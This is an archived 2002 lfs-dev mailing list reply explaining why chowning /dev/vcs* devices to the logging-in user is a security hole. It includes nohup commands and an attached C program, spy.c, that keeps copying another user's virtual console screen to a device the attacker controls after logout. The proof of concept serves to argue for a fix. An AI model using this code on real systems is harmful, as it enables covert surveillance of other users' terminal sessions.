shadow chown(tty) - problem

Richard Lightman richard at nezumi.plus.com
Sun Sep 1 03:00:33 PDT 2002


* YuX <yux at cg.ukrtel.net> [2002-09-01 08:29]:
> 
> #ifdef __linux__
>  /*
>   * Please don't add code to chown /dev/vcs* to the user logging in -
>   * it's a potential security hole.  I wouldn't like the previous user
>   * to hold the file descriptor open and watch my screen.  We don't
>   * have the *BSD revoke() system call yet, and vhangup() only works
>   * for tty devices (which vcs* is not).  --marekm
>   */
> #endif
> 
> --- d'ont see problem here :(
> 
I log in, and and run:
nohup ./spy /dev/vcc/1  /dev/vcc/2  &
nohup ./spy /dev/vcc/a1 /dev/vcc/a2 &

Then log out. You log in, and everything you see on terminal 1 appears
on terminal 2. With a bit more effort, I could get the output to cross
a network. I own the spy processes, so you cannot kill them - unless
you are root.

I could get conlogin (which is setuid) to kill this sort of thing.
I will get back to you if it works.

Richard
-------------- next part --------------
/* spy.c */
#include <fcntl.h>
#include <unistd.h>

int main(int argc, char **argv) {
	int in,	out;
	char *buffer[4096];
	ssize_t s;

	if (0 > (in = open(argv[1], O_RDONLY))) goto fail;
	if (0 > (out= open(argv[2], O_WRONLY))) goto fail;

	while(1) {
		sleep(1);
		if (0 < lseek(in, SEEK_SET, 0)) goto fail;
		if (0 < lseek(out,SEEK_SET, 0)) goto fail;
		while(0 < (s = read(in, buffer, 4096)))
			write(out, buffer, s);
		if (0 > s) break;
	}
fail:	printf("Problem: %m\n");
	return 1;
}


More information about the lfs-dev mailing list